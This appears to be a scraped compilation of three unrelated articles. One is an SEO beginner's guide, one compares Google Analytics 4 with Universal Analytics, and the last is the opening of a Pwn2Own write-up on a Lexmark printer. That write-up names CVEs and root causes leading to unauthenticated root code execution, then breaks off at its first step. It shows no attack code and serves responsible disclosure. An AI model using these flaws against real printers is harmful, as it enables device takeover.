Category: Mobile

The Ultimate Guide to SEO in 2022

What is the first thing you do when you need new marketing ideas? What about when you decide it’s time to find a new accounting software? Or even when you notice a flat tire in the car?

My guess is you turn to Google.

Impact Plus reported that 61% of marketers named SEO as a top marketing priority in 2021. And so, it’s a cold, harsh truth that without at least some presence on Google, your business faces a digital uphill battle. In this guide, you’ll discover a strategy to build your online presence — Search Engine Optimization (SEO). You’ll learn what SEO is, how it works, and what you must do to position your site in search engine results.

→ Download Now: SEO Starter Pack [Free Kit]

But before we begin, I want to reassure you of something.

So many resources make SEO complex. They scare readers with technical jargon, advanced elements, and rarely explain anything beyond theory.

I promise you, this guide isn’t like that.

I’m going to break SEO into its most basic parts and show you how to use all its elements to construct a successful SEO strategy. (And to stay up-to-date on SEO strategy and trends, check out HubSpot’s Skill Up podcast.)

Keep on reading to understand SEO, or jump ahead to the section that interests you most.

  1. What is SEO?
  2. How Google Ranks Content
  3. How to Build an SEO Strategy
  4. How to Measure SEO
  5. Local and Black Hat SEO
  6. SEO Resources

What is SEO?

SEO stands for search engine optimization. The goal of SEO is to expand a company’s visibility in organic search results. As a result, these efforts drive more visitors to the company’s website, increasing their chances for more conversions which leads to more customers and more revenue.

When asked to explain what SEO is, I often choose to call it a strategy to ensure that when someone Googles your product or service category, they find your website.

But this simplifies the discipline a bit.

There are a ton of ways to improve the SEO of your site pages. Search engines look for elements including title tags, keywords, image tags, internal link structure, and inbound links (also known as backlinks). Search engines also look at site structure and design, visitor behavior, and other external, off-site factors to determine how highly ranked your site should be in their SERPs.

With all of these factors taken into account, SEO primarily drives two things — rankings and visibility.

How Does SEO Work?

SEO works by optimizing a website’s content, conducting keyword research, and earning inbound links to increase that content’s ranking and the website’s visibility. While you can generally see results take effect on the SERP once the webpage has been crawled and indexed by a search engine, SEO efforts can take months to fully materialize.

Rankings

This is what search engines use to determine where to place a particular web page in the SERP. Rankings start at position number zero through the final number of search engine results for the query, and a web page can rank for one position at a time. As time passes, a web page’s ranking might change due to age, competition in the SERP, or algorithm changes by the search engine itself.

Visibility

This term describes how prominent a particular domain is in the search engine results. Lower search visibility occurs when a domain isn’t visible for many relevant search queries whereas with higher search visibility, the opposite is true.

Both are responsible for delivering the main SEO objectives – traffic and domain authority.

What’s the importance of SEO?

Why do seo? Four benefits of SEO in 2022

There is one more important reason why you should be using SEO: The strategy virtually helps you position your brand throughout the entire buying journey.

In turn, SEO can ensure that your marketing strategies match the new buying behavior.

Because, as Google admitted, customer behavior has changed for good.

As of June 2021, 92% of internet searches happen on a Google property.

What’s more, they prefer going through the majority of the buying process on their own.

For example, Ststista found that 60% of people research a brand online before making a purchase. What’s more, this process has never been more complicated.

Finally, DemandGen’s 2022 B2B Buyer’s Survey found that 67% of B2B buyers start the buying process with a broad web search.

But how do they use search engines during the process?

Early in the process, they use Google to find information about their problem. Some also inquire about potential solutions.

Then, they evaluate available alternatives based on reviews or social media hype before inquiring with a company. But this happens after they’ve exhausted all information sources.

And so, the only chance for customers to notice and consider you is by showing up in their search results.

Featured Resource

How does Google know how to rank a page?

Search engines have a single goal only. They aim to provide users with the most relevant answers or information.

Every time you use them, their algorithms choose pages that are the most relevant to your query. And then, rank them, displaying the most authoritative or popular ones first.

To deliver the right information to users, search engines analyze two factors:

  • Relevancy between the search query and the content on a page. Search engines assess it by various factors like topic or keywords.
  • Authority, which is measured by a website’s popularity on the Internet. Google assumes that the more popular a page or resource is, the more valuable its content is to readers.

And to analyze all this information they use complex equations called search algorithms.

Search engines keep their algorithms secret. But over time, SEOs have identified some of the factors they consider when ranking a page. We refer to them as ranking factors, and they are the focus of an SEO strategy.

When determining relevance and authority, following the E-A-T framework can help tremendously. E-A-T in SEO stands for “expertise”, authoritativeness”, and “trustworthiness”. And although these are not direct ranking factors, they can improve your SEO content which can impact direct ranking factors.

As you’ll shortly see, adding more content, optimizing image filenames, or improving internal links can affect your rankings and search visibility. And that’s because each of those actions improves a ranking factor.

What is SEO strategy?

An SEO marketing strategy is a comprehensive plan to get more visitors to your website through search engines. Successful SEO includes on-page strategies, which use intent-based keywords; and off-page strategies, which earn inbound links from other websites.

What is SEO strategy?

An SEO marketing strategy is a comprehensive plan to get more visitors to your website through search engines. Successful SEO includes on-page strategies, which use intent-based keywords; and off-page strategies, which earn inbound links from other websites.

Three Core Components of a Strong SEO Strategy

To optimize a site, you need to improve ranking factors in three areas — technical website setup, content, and links. So, let’s go through them in turn.

1. Technical Setup

For your website to rank, three things must happen:

First, a search engine needs to find your pages on the web.

Then, it must scan them to understand their topics and identify their keywords.

And finally, it needs to add them to its index — a database of all the content it has found on the web. This way, its algorithm can consider displaying your website for relevant queries.

Seems simple, doesn’t it? Certainly, nothing to worry about. After all, since you can visit your site without any problem, so should Google, right?

Unfortunately, there is a catch. A web page looks different for you and the search engine. You see it as a collection of graphics, colors, text with its formatting, and links.

To a search engine, it’s nothing but text.

As a result, any elements it cannot render this way remain invisible to the search engine. And so, in spite of your website looking fine to you, Google might find its content inaccessible.

Let me show you an example. Here’s how a typical search engine sees one of our articles. It’s this one, by the way, if you want to compare it with the original.

The ultimate guide to marketing statistics in 2021 as a plain text version of the site that Google sees when crawling the site for SEO

Notice some things about it:

  • The page is just text. Although we carefully designed it, the only elements a search engine sees are text and links.
  • As a result, it cannot see an image on the page (note the element marked with an arrow.) It only recognizes its name. If that image contained an important keyword we’d want the page to rank for, it would be invisible to the search engine.

That’s where technical setup, also called on-site optimization, comes in. It ensures that your website and pages allow Google to scan and index them without any problems. The most important factors affecting it include:

Website navigation and links

Search engines crawl sites just like you would. They follow links. Search engine crawlers land on a page and use links to find other content to analyze. But as you’ve seen above, they cannot see images. So, set the navigation and links as text-only.

Simple URL structure

Search engines don’t like reading lengthy strings of words with complex structure. So, if possible, keep your URLs short. Set them up to include as little beyond the main keyword for which you want to optimize the page, as possible.

Page speed

Search engines use the load time — the time it takes for a user to be able to read the page — as an indicator of quality. Many website elements can affect it. Image size, for example. Use Google’s Page Speed Insights Tool for suggestions on how to improve your pages.

Dead links or broken redirects

A dead link sends a visitor to a nonexistent page. A broken redirect points to a resource that might no longer be there. Both provide poor user experience but also, prevent search engines from indexing your content.

Sitemap and Robots.txt files

A sitemap is a simple file that lists all URLs on your site. Search engines use it to identify what pages to crawl and index. A robots.txt file, on the other hand, tells search engines what content not to index (for example, specific policy pages you don’t want to appear in search.) Create both to speed up crawling and indexing of your content.

Duplicate content

Pages containing identical or quite similar content confuse search engines. They often find it to be nearly impossible to display any of those pages at all. If search engines do find them, your website can be penalized. For that reason, search engines consider duplicate content as a negative factor.

Featured Resource

2. Content

Every time you use a search engine, you’re looking for content — information on a particular issue or problem, for example.

True, this content might come in different formats. It could be text, like a blog post or a web page. But it could also be a video, product recommendation, and even a business listing.

It’s all content.

And for SEO, it’s what helps gain greater search visibility.

Here are two reasons why:

  • First, content is what customers want when searching. Regardless of what they’re looking for, it’s content that provides it. And the more of it you publish, the higher your chance for greater search visibility.
  • Also, search engines use content to determine how to rank a page. It’s the idea of relevance between a page and a person’s search query that we talked about earlier.

While crawling a page, they determine its topic. Analyzing elements like page length or its structure helps them assess its quality. Based on this information, search algorithms can match a person’s query with pages they consider the most relevant to it.

The process of optimizing content begins with keyword research.

Keyword Research

SEO is not about getting any visitors to the site. You want to attract people who need what you sell and can become leads, and later, customers.

However, that’s possible only if it ranks for the keywords those people would use when searching. Otherwise, there’s no chance they’d ever find you. And that’s even if your website appeared at the top of the search results.

That’s why SEO work starts with discovering what phrases potential buyers enter into search engines.

The process typically involves identifying terms and topics relevant to your business. Then, converting them into initial keywords. And finally, conducting extensive research to uncover related terms your audience would use.

We’ve published a thorough guide to keyword research for beginners. It lays out the keyword research process in detail. Use it to identify search terms you should be targeting.

With a list of keywords at hand, the next step is to optimize your content. SEOs refer to this process as on-page optimization.

On-Page Optimization

On-page optimization, also called on-page SEO, ensures that search engines a.) understand a page’s topic and keywords, and b.) can match it to relevant searches.

Note, I said “page” not content. That’s because, although the bulk of on-page SEO work focuses on the words you use, it extends to optimizing some elements in the code.

You may have heard about some of them — meta-tags like title or description are two most popular ones. But there are more. So, here’s a list of the most crucial on-page optimization actions to take.

Note: Since blog content prevails on most websites, when speaking of those factors, I’ll focus on blog SEO — optimizing blog posts for relevant keywords. However, all this advice is equally valid for other page types too.

Featured Resource

a) Keyword Optimization

First, ensure that Google understands what keywords you want this page to rank. To achieve that, make sure you include at least the main keyword in the following:

  • Post’s title: Ideally, place it as close to the start of the title. Google is known to put more value on words at the start of the headline.
  • URL: Your page’s web address should also include the keyword. Ideally, including nothing else. Also, remove any stop word.
  • H1 Tag: In most content management systems, this tag displays the title of the page by default. However, make sure that your platform doesn’t use a different setting
  • The first 100 words (or the first paragraph) of content: Finding the keyword at the start of your blog post will reassure Google that this is, in fact, the page’s topic.
  • Meta-title and meta-description tags: Search engines use these two code elements to display their listings. They display the meta-title as the search listing’s title while the meta-description provides content for the little blurb below it. But above that, they use both to understand the page’s topic further.
  • Image file names and ALT tags: Remember how search engines see graphics on a page? They can only see their file names. So, make sure that at least one of the images contains the keyword in the file name.

The alt tag, on the other hand, is text browsers display instead of an image (for visually impaired visitors.) However, since ALT tag resides in the image code, search engines use it as a relevancy signal as well.

Also, add semantic keywords — variations or synonyms of your keyword. Google and other search engines use them to determine a page’s relevancy better.

Let me illustrate this with a quick example. Let’s pretend that your main keyword is “Apple.” But do you mean the fruit or the tech giant behind the iPhone?

Now, imagine what happens when Google finds terms like sugar, orchard, or cider in the copy? The choice of what queries to rank it for would immediately become obvious, right?

That’s what semantic keywords do. Add them to ensure that your page doesn’t start showing up for irrelevant searches.

b) Non-Keyword-Related On-Page Optimization Factors

On-page SEO is not just about sprinkling keywords across the page. The factors below help confirm a page’s credibility and authority too:

  • External links: Linking out to other, relevant pages on the topic helps Google determine its topic further. Plus, it provides a good user experience. How? By positioning your content as a valuable resource.
  • Internal links: Those links help you boost rankings in two ways. One, they allow search engines to find and crawl other pages on the site. And two, they show semantic relations between various pages, helping to determine its relevance to the search query better. As a rule, you should include at least 2-4 internal links per blog post
  • Content’s length: Long content typically ranks better. That’s because, if done well, a longer blog post will always contain more exhaustive information on the topic, thus keeping a reader on your site longer. That’s called dwell time, and it’s an important ranking factor for the search engines
  • Multimedia: Although not a requirement, multimedia elements like videos, diagrams, audio players can signal a page’s quality. It keeps readers on a page for longer just like longer content does. And in turn, it signals that they find the content valuable and worth pursuing.

3. Links

From what you’ve read in this guide so far, you know that no page will rank without two factors — relevance and authority.

In their quest to provide users with the most accurate answers, Google and other search engines prioritize pages they consider the most relevant to their queries but also, popular.

The first two areas — technical setup and content — focused on increasing relevance (though I admit, some of their elements can also help highlight the authority.)

Links, however, are responsible for popularity.

But before we talk more about how they work, here’s what SEOs mean when talking about links.

What is a backlink?

Links, also called backlinks, are references to your content on other websites. Every time another website mentions and points their readers to your content, you gain a backlink to your site.

For example, this article in Entrepreneur.co mentions our Not Another State of Marketing Report page. It also links to it allowing their readers to see other stats than the one quoted.

An example of a backlink from entrepreneur.com to HubSpot's Not Another State of Marketing Report

Google uses the quantity and quality of links like this as a signal of a website’s authority. Its logic behind it is that webmasters would reference a popular and high-quality website more often than a mediocre one.

But note that I mentioned link quality as well. That’s because not all links are the same. Some — low-quality ones — can impact your rankings negatively.

Links Quality Factors

Low quality or suspicious links — for example, ones that Google would consider as built deliberately to make it consider a site as more authoritative — might reduce your rankings.

That’s why, when building links, SEOs focus not on building any links. They aim to generate the highest quality references possible.

Naturally, just like with the search algorithm, we don’t know what factors determine a link’s quality, specifically. However, over time, SEOs discovered some of them:

  • The popularity of a linking site: Any link from a domain that search engines consider an authority will naturally have high quality. In other words, links from websites that have good quality links pointing to them will yield better results.
  • Topic relevance: Links from domains on a topic similar to yours will carry more authority than those from random websites.
  • Trust in a domain: Just like with popularity, search engines also assess a website’s trust. Links from more trustworthy sites will always impact rankings better.

Link Building

In SEO, we refer to the process of acquiring new backlinks as link building. And as many practitioners admit, it can be a challenging activity.

Link building, if you want to do it well, requires creativity, strategic thinking, and patience. To generate quality links, you need to come up with a link building strategy. And that’s no small feat.

Remember, your links must pass various quality criteria. Plus, it can’t be obvious to search engines that you’ve built them deliberately.

Here are some strategies to do it:

  • Editorial, organic links: These backlinks come from websites that reference your content on their own.
  • Outreach: In this strategy, you contact other websites for links. This can happen in many ways. You could create an amazing piece of content, and email them to tell them about it. In turn, if they find it valuable, they’ll reference it. You can also suggest where they could link to it.
  • Guest posting: Guest posts are blog articles that you publish on third-party websites. In turn, those companies often allow including one or two links to your site in the content and author bio.
  • Profile links: Finally, many websites offer an opportunity to create a link. Online profiles are a good example. Often, when setting up such a profile, you can also list your website there as well. Not all such links carry strong authority, but some might. And given the ease of creating them, they’re worth pursuing.
  • Competitive analysis: Finally, many SEOs regularly analyze their competitors’ backlinks to identify those they could recreate for their sites too.

Now, if you’re still here with me, then you’ve just discovered what’s responsible for your site’s success in search.

The next step, then, is figuring out whether your efforts are working.

How to Monitor & Track SEO Results

Technical setup, content, and links are critical to getting a website into the search results. Monitoring your efforts helps improve your strategy further.

Measuring SEO success means tracking data about traffic, engagement, and links. And though, most companies develop their own sets of SEO KPIs (key performance indicators), here are the most common ones:

  • Organic traffic growth
  • Keyword rankings (split into branded and non-branded terms)
  • Conversions from organic traffic
  • Average time on page and the bounce rate
  • Top landing pages attracting organic traffic
  • Number of indexed pages
  • Links growth (including new and lost links)

Local SEO

Up until now, we focused on getting a site rank in search results in general. If you run a local business, however, Google also lets you position it in front of potential customers in your area, specifically. But for that, you use local SEO.

And it’s well worth it.

46% of Google searches are for local businesses. They look for vendor suggestions, and even specific business addresses.

What’s more, they act on this information: 72% of searchers visit a local store or company’s premises within 24 hours of the search.

But hold on, is local SEO different from what we’ve been talking about all along?

Yes and no.

Search engines follow similar principles for both local and global rankings. But given that they position a site for specific, location-based results, they need to analyze some other ranking factors too.

Even local search results look different:

  • They appear only for searches with a local intent (for example, “restaurant near me” or when a person clearly defined the location.)
  • They contain results specific to a relevant location.
  • They concentrate on delivering specific information to users that they don’t need to go anywhere else to find.
  • They target smartphone users primarily as local searches occur more often on mobile devices.

For example, a localpack, the most prominent element of local results, includes almost all information a person would need to choose a business. Here are local results Google displays for the phrase “best restaurant in Boston.”

Local SEO example of a localpack featured snippet in the SERP

Note that these results contain no links to any content. Instead, they include a list of restaurants in the area, a map to show their locations, and additional information about each:

  • Business name
  • Description
  • Image
  • Opening hours
  • Star Reviews
  • Address

Often, they also include a company’s phone number or website address.

All this information combined helps customers choose which business to engage. But it also allows Google to determine how to rank it.

Local Search Ranking Factors

When analyzing local websites, Google looks at the proximity to a searcher’s location. With the rise of local searches containing the phrase, “near me,” it’s only fair that Google will try to present the closest businesses first.

Keywords are essential for local SEO too. However, one additional element of on-page optimization is the presence of a company’s name, address, and phone number of a page. In local SEO, we refer to it as the NAP.

Again, it makes sense, as the search engine needs a way to assess the company’s location.

Google assesses authority in local search not just by links. Reviews and citations (references of a business’s address or a phone number online) highlight its authority too.

Finally, the information a business includes in Google My Business — the search engine’s platform for managing local business listings — plays a huge part in its rankings.

The above is just the tip of the iceberg. But they are the ones to get right first if you want your business to rank well in local search.

What is black hat SEO?

The final aspect of SEO I want to highlight to you is something I also hope you’ll never get tempted to use. I mean it.

Because, although it might have its lure, using black hat SEO typically ends in a penalty from search listings.

Black hat practices aim at manipulating search engine algorithms using strategies against search engine guidelines. The most common black hat techniques include keyword stuffing, cloaking (hiding keywords in code so that users don’t see them, but search engines do), and buying links.

So, why would someone use black hat SEO? For one, because, often, ranking a site following Google’s guidelines takes time. Long time, in fact.

Black hat strategies let you cut down the complexity of link building, for example. Keyword stuffing helps users to rank one page for many keywords, without having to create more content.

But as said, getting caught often results in a site being completely wiped out from search listings.

And the reason I mention it here is that I want you to realize that there are no shortcuts in SEO. And be aware of anyone suggesting strategies that might seem too good to be true.

Should you outsource SEO or keep it in-house?

Whether you work on SEO yourself, delegate it to another team member, or outsource it completely, you’ll want to make this decision with as much knowledge as possible.

Doing SEO Yourself

Be honest with yourself — are you interested in learning SEO? Do you have time to learn the basics? Do you have the resources to bring in help if you redesign your website and accidentally deindex several pages? If the answer to any of these questions is “no,” then you might not want to take on the responsibility of SEO yourself. SEO is a long term play, and just like a muscle, you have to work at it consistently to see results. That can take a substantial amount of commitment. If you have any doubts, try the next best thing — delegating the work.

Delegate SEO to a Team Member

If you’re not quite sure about taking on SEO yourself, consider delegating the work to a team member. If you have a person who’s interested in growth marketing, development, or even web design, this would be a valuable skill to help grow their career. You could also hire a full-time search engine optimization specialist if you have the budget.

The person in this role can report to the marketing team, development team, or even design team. Because SEO touches nearly every function of a business while maintaining a unique set of skill requirements, this position won’t be subject to frequent changes if departments need to be restructured later on. The person you delegate to this job will contribute cross functionally more often than not, so you’ll have some liberty with managing them.

Outsource SEO to an Agency

You don’t have the interest in SEO, your team’s at full capacity, and you can’t spare the budget to fill a full time SEO role. Now what? The best bang for your buck is to outsource SEO to a reputable consultant. Why? First, a well-respected SEO consultant is highly skilled in bringing organic traffic, leads, and conversions to businesses. They do this day in and day out, so they won’t need the ramp up time that you or a member of your team would need in order to learn the basics.

Second, a consultant can be less expensive than hiring someone full-time for the role because they don’t require insurance benefits, payroll taxes, etc. But how much exactly would you be looking at for outsourcing your SEO?

SEO can cost between $100 and $500 per month if you do it yourself with a keyword research tool. It can cost between $75 and $150 per hour for a consultant, and up to $10,000 per month if you hire a full-service marketing agency. Small businesses generally spend less on SEO than big brands, so be sure to take that into account.

Incurring SEO costs can mean one of two things: the investment in your organic search strategy, or how much you pay for paid search engine marketing (SEM) services like Google Ads. If you’re paying for a tool, consultant, or marketing agency to help you optimize your web content, your bill can vary wildly with the depth of the services you’re receiving.

SEO Resources & Training

This guide is just a starting point for discovering SEO. But there’s much more to learn.

Here are online training resources to try next if your or someone on your team wants to take on this skill:

You can also pick SEO knowledge from industry experts and their blogs. Here are some worth reading:

Over To You

Without actively positioning its content in search results, no business can survive long.

By increasing your search visibility, you can bring more visitors, and in turn, conversions and sales. And that’s well worth the time spent becoming an expert in SEO.

Editor’s note: This post was originally published in November 2019 and has been updated for comprehensiveness.

marketing

Source :
https://blog.hubspot.com/marketing/seo

Google Analytics 4 vs Universal Analytics: Full Comparison 2022

Do you want to know what’s new in Google Analytics 4? How is GA4 different from Universal Analytics?

There’s a lot that’s changed in the new Google Analytics 4 platform including the navigation. Google has added new features and removed a number of reports you’re familiar with. And that means we’ll need to relearn the platform.

In this guide, we’ll detail the differences between Google Analytics 4 (GA4) vs. Universal Analytics (UA) so that you’re prepared to make the switch.

If you haven’t already switched to Google Analytics 4, we have an easy step-by-step guide you can follow: How to Set Up Google Analytics 4 in WordPress.

What’s New Only in Google Analytics 4?

In this section, we’re detailing the things that are new in GA4 that aren’t present in Universal Analytics at all. A little later, we’ll go into depth about all the changes you need to know about.

  1. Creating and Editing Events: GA4 brings about a revolutionary change in the way you track events. You can create a custom event and modify events right inside your GA4 property. This isn’t possible with Universal Analytics unless you write code to create a custom event.
  2. Conversion Events: Conversion goals are being replaced with conversion events. You can simply mark or unmark an event to start tracking it as a conversion. There’s an easy toggle switch to do this. GA4 even lets you create conversion events ahead of time before the event takes place.
  3. Data Streams: UA lets you connect your website’s URL to a view. These views let you filter data. So for instance, you can create a filter in a UA view to exclude certain IP addresses from reports. GA4 uses data streams instead of views.
  4. Data filters:  Now you can add data filters to include or exclude traffic internal and developer traffic from your GA4 reports.
  5. Google Analytics Intelligence: You can delete search queries from your search history to fine-tune your recommendations.
  6. Explorations and Templates: There’s a new Explore item in the menu that takes you to the Explorations page and Template gallery. Explorations give you a deeper understanding of your data. And there are report templates that you can use.
  7. Debug View: There’s a built-in visual debugging tool which is awesome news for developers and business owners. With this mode, you can get a real-time view of events displayed on a vertical timeline graph. You can see events for the past 30 minutes as well as the past 60 seconds.
  8. BigQuery linking: You can now link your GA4 account with your BigQuery account. This will let you run business intelligence tasks on your analytics property using BigQuery tools.

While this is what’s unique to GA4, there are a lot more changes than this. But first, let’s take a look at what’s gone from the Universal Analytics platform that we’re all familiar with.

What’s Missing in Google Analytics 4?

Google Analytics 4 has done away with some of the old concepts. These include:

  1. Views and Filters: As we mentioned, GA4 is not using Data Streams and we explain this in depth a bit later. So you won’t be able to create a view and related filters. Once you convert your UA property to GA4, you’ll be able to access a read-only list of UA filters under Admin > Account > All Filters.
  2. Customization (menu): UA properties have a customization menu for options to create dashboards, create custom reports, save existing reports, and create custom alerts. Below are the UA customization options, along with their GA4 equivalent.
    • Dashboards: At the time of writing this, there isn’t a way to create a custom GA4 dashboard.
    • Custom reports: GA4 has the Explorations page instead where you can create custom reports.
    • Saved reports: When you create a report in Explorations, it is automatically saved for you.
    • Custom alerts: Inside custom Insights, which is a new feature in GA4, you can set custom alerts.
  3. Google Search Console linking: There isn’t a way to link Google Search Console with a GA4 property at the time of writing.
  4. Bounce rate: One of the most tracked metrics – the bounce rate – is gone. It’s likely that this has been replaced with Engagement Metrics.
  5. Conversion Goals: In UA, you could create conversion goals under Views. But since views are gone, so are conversion goals. However, you can create conversion events to essentially track the same thing.

Now that you know what’s new and what’s missing in GA4, we’ll take you through an in-depth tour of the new GA4 platform.

Google Analytics 4 vs Universal Analytics

Below, we’ll be covering the main differences between GA4 and UA. We’ve created this table of contents for you to easily navigate the comparison guide:

Feel free to use the quick links to skip ahead to the section that interests you the most.

New Mobile Analytics

A major difference between GA4 and UA is that the new GA4 platform will also support mobile app analytics.

In fact, it was originally called “Mobile + Web”.

UA only tracked web analytics so it was difficult for businesses with apps to get an accurate outlook on their performance and digital marketing efforts.

Now with GA4 data model, you’ll be able to track both your website and app. You can set up a data stream for Android and iOS.

GA4 data streams

There’s also added functionality to create custom campaigns to collect information about which mediums/referrals are sending you the most traffic. This will show you where your campaigns get the most traction so that you can optimize your strategies in the future.

Easy User ID Tracking

Turning on user ID tracking in UA was quite a task. But that’s all been simplified in GA4 with the new measurement model. You simply need to navigate to Admin » Property Settings » Reporting Identity tab.

reporting identity in GA4

You can choose between Blended and Observed mode. Select the one you want and save your changes. That’s it.

In GA4, the reporting interface remains familiar and the navigation menu is still on the left! That keeps things familiar but there are quite a few menu items that have changed.

First, there are only 4 high-level menu items right now. Google may add more as the platform is further developed.

GA4 main menu

Next, each menu item has a collapsed view. You can expand each item by clicking on it.

Now when you click on the submenu items, it will expand the menu to reveal more sub menus.

Submenu in ga4

In GA4, you’ll see familiar menu items you use for SEO and other purposes but in different locations. Here are the notable changes:

  • Realtime is under Reports
  • Audience(s) is under Configure
  • Acquisition is under Reports » Life cycle
  • Conversions is under Configure

GA4 also comes with completely new menu items as listed below:

  • Reports snapshot
  • Engagement
  • Monetization
  • Retention
  • Library
  • Custom definitions
  • DebugView

Measurement ID vs Tracking ID

Universal Analytics uses a Tracking ID that has a capital UA, a hyphen, a 7-digit tracking code followed by another hyphen, and a number. Like this: UA-1234567-1.

The last number is a sequential number starting from 1 that maps to a specific property in your Google Analytics account. So if you set up a second Google Analytics property, the new code will change to UA-1234567-2.

You can find the Tracking ID for a Universal Analytics property under Admin » Property column. Navigate to Property Settings » Tracking ID tab where you can see your UA tracking ID.

In GA4, you’ll see a Measurement ID instead of a Tracking ID. This starts with a capital G, a hyphen followed by a 10-character code.

GA4 stream measurement id

It would look like this: G-SV0GT32HNZ.

To find your GA4 Measurement ID, go to Admin » Property » Data Streams. Click on a data stream. You’ll see your Measurement ID in the stream details after the Stream URL and Stream Name.

Data Streams vs Views

In UA, you could connect your website’s URL to a view. UA views are mostly used to filter data. So for instance, you can create a filter in a UA view to exclude certain IP addresses from reports.

GA4 uses data streams instead. You’ll need to connect your website’s URL to a data stream.

But don’t be mistaken, they are not the same as views.

Also, you can’t create a filter in GA4. In case your property was converted from UA to GA4, then you can find a read-only list of UA filters under Admin » Account » All Filters.

read-only-ua-view-filters

Now Google defines a data stream as:

“A flow of data from your website or app to Analytics. There are 3 types of data stream: Web (for websites), iOS (for iOS apps), and Android (for Android apps).”

You can use your data stream to find your measurement ID and global site tag code snippet. You can also enable enhanced measurements such as your page views, scrolls, and outbound clicks.

data streams in ga4

In a data stream, you can do the following:

  • Set up a list of domains for cross-domain tracking
  • Create a set of rules for defining internal traffic rules
  • Put together a list of domains to exclude from tracking

Data streams will make a lot of things easier. But there are 2 things that you need to be aware of. First, once you create a data stream, there’s no way to edit it. And if you delete a data stream, you can’t undo this action.

Events vs. Hit Types

UA tracks data by hit types which is essentially an interaction that results in data being sent to Analytics. This includes page hits, event hits, eCommerce hits, and social interaction hits.

GA4 moves away from the concept of hit types. Instead, it’s event-based meaning every interaction is captured as an event. This means everything including page, events, eCommerce transactions, social, and app view hits are all captured as events.

There’s also no option for creating conversion goals. But GA4 lets you flag or mark an event as a conversion with the flip of a toggle switch.

Toggle conversions on in GA4

This is essentially the same thing as creating a conversion goal in Universal Analytics. You can also create new conversion events ahead of time before those events actually take place.

In GA4, Google organizes events into 4 categories and recommends that you use them in this order:

1. Automatically collected

In the first event category, there’s no option to turn on any setting for tracking events so you don’t need to activate anything here. Google will automatically collect data on these events:

  • first_visit – the first visit to a website or Android instant app
  • session_start – the time when a visitor opens a web page or app
  • user_engagement – when a session lasts longer than 10 seconds or had 1 or more conversions or had 2 or more page views

Keep in mind that we’re only at the start of GA4. With Google’s ever-advancing and machine-learning technology, more automatically collected events may be added as the platform progresses.

2. Enhanced measurement

In this section, you don’t need to write any code but there are settings to turn on enhanced measurements. This will give you an extra set of automatically collected events.

To enable this data collection, you need to turn on the Enhanced measurement setting in your Data Stream.

enhanced measurement in ga4

Then you’ll see more enhanced measurement events that include:

  • page_view: a page-load in the browser or a browser history state change
  • click:  a click on an outbound link that goes to an external site
  • file-download: a click that triggers a file download
  • scroll: the first time a visitor scrolls to the bottom of a page

3. Recommended

These GA4 events are recommended but aren’t automatically collected in GA4 so you’ll need to enable them if you want to track them.

We suggest you check out what is in the recommended events and turn on tracking for what you need. This can include signups, logins, and purchases.

Before we move to custom events, if you don’t see these 3 event types – automatically collected, enhanced measurement, and recommended – in your dashboard, you should ideally create a custom event for it.

4. Custom

Custom events let you set up tracking for any event that doesn’t fall into the above 3 categories. You can create and modify your events. So for instance, you can create custom events to track menu clicks.

You can design and write custom code to enable tracking for the event you want. But there is no guarantee that Google will support your custom metrics and events.

No Bounce Rate

The bounce rate metric has vanished! It’s been suggested that Google wants to focus on users that stay on your website rather than the ones that leave.

So this has likely been replaced with engagement rate metrics to collect more data on user interactions and engaged sessions.

No Custom Reports

UA properties have a customization menu for options to create dashboards, create custom reports, save existing reports, and create custom alerts.

A lot of this has changed in GA4. To make it easier for you to understand, here are the UA metrics and their GA4 equivalents:

  • Custom reports can be found in the Explorations page.
  • Saved reports are automatically created when you run an Exploration.
  • Custom alerts can be set up inside custom Insights from the GA4 home page.

One more thing to note is that you also won’t find a way to link Google Search Console with a GA4 property (at the time of writing). And that’s all the key differences between Universal Analytics and Google Analytics 4.

Now you may be wondering whether you HAVE TO make the switch to GA4. A lot of our users have been asking us this question so we’ll tell you quickly what you need to do.

Do I Have To Switch to GA4?

Google will retire Universal Analytics in July 2023. You’ll have access to your UA data for some time but all new data will flow into GA4. If you have a US property set up, you’ll see this warning in your dashboard:

universal analytics warning

So you have to set up a GA4 property sooner or later and we recommend that you do it sooner. This is because your UA data won’t be transferred to GA4. You have to start afresh.

You can set up your GA4 property now and let it collect data. In the meantime, you can continue to use Universal Analytics and use the time to learn the new GA4 platform. Then when we’re all forced to make the switch, you’ll have plenty of historical data in your GA4 property.

If you haven’t set up your Google Analytics 4 property yet, we’ve compiled an easy step-by step guide for you: How to Set Up Google Analytics 4 in WordPress.

Want to skip the guide and use a tool? Then MonsterInsights is the best to set up GA4. It even lets you create dual tracking profiles so you can have both UA and GA4 running simultaneously.

Get MonsterInsights Now »

After setting up GA4, you can go deeper into your data with these guides:

These posts will help you track your users and their activity on your site so that you can get more valuable insights and analytics data to improve your site’s performance.

Source :
https://www.isitwp.com/google-analytics-4-vs-universal-analytics/

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

ProductLexmark MC3224
Affected Firmware Versions
(without claim for completeness)		CXLBL.075.272 (2021-07-29)
CXLBL.075.281 (2021-10-14)
Fixed Firmware VersionCXLBL.076.294 (CVE-2021-44735) Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert
CVECVE-2021-44735 (Shell Command Injection)
CVE-2021-44736 (Authentication Reset)
Root CausesAuthentication Bypass, Shell Command Injection, Insecure SUID Binary
ImpactUnauthenticated Remote Code Execution (RCE) as root
ResearchersHanno Heinrichs, Lukas Kupczyk
Lexmark Resourceshttps[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf
https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

